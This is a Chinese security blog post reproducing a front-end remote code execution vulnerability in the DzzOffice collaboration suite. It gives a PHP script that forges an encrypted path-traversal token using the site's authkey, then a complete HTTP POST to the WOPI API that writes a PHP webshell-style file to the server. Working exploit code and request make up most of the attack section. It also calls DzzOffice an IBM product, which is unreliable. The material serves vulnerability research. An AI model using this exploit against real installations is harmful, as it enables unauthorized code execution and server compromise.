dzzoffice 前台RCE复现

admin

138858
文章

114
评论

2021年4月20日11:22:50评论934 views字数 2177阅读7分15秒阅读模式

简介

DzzOffice是美国IBM（DzzOffice）公司的一个可提供在线协同办公套件功能的平台。该平台可为用于提供在线文档、表格、网盘、演示等功能。

环境搭建

https://github.com/zyx0814/dzzoffice/releases/

dzzoffice 前台RCE复现

安装完成

dzzoffice 前台RCE复现

漏洞复现

首先需要获取到authkey 我现在的环境的key为：c93fa4WvJjY4l8C8

加密的脚本

<?phpfunction authcode_config($string,$key, $operation = 'DECODE', $expiry = 0){$ckey_length = 4;$key = md5($key);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);$result = '';$box = range(0, 255);$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));}}echo base64_encode(authcode_config("disk::..././..././..././shell.php",md5('c93fa4WvJjY4l8C8'),'ENCODE'));

dzzoffice 前台RCE复现

构建数据包并发送

POST /dzzoffice/core/api/wopi/index.php?access_token=1&action=contents&path=M2Q3OWxMSm84dHArN0srbHc1dmx3Ym0zVVN5elpxM09sb2hTS0tIbitadW42ak9BaU1EZnZxUlRIT0NTR09lNjUrbkVXU3FyZzd4c3g0NURDc0k= HTTP/1.1Host: 192.168.1.103Content-Length: 18Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://word.comReferer: http://word.com/user.php?mod=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close <?php phpinfo();?>

dzzoffice 前台RCE复现

本文始发于微信公众号（锋刃科技）：dzzoffice 前台RCE复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

dzzoffice 前台RCE复现

代码审计|SpringKill如何用CodeAuditAssistant挖掘0day教程公布

【代码审计】记某次项目前台反序列化RCE漏洞研究

某短视频矩阵营销系统前台RCE漏洞审计

JAVA安全调试篇（无源码远程调试WAR包(以S2-001为例)）

某PHP代码审计前台RCE漏洞案例分析

源代码审计常见漏洞

fastjson1.2.80 in Springtboot新链学习记录

【万字详细】PHP与ThinkPHP框架代码审计综合技巧

某天OA-workFlowService-多处SQL注入漏洞分析

【Python代码审计】佰阅发卡存在前台RCE漏洞

发表评论

在线咨询

微信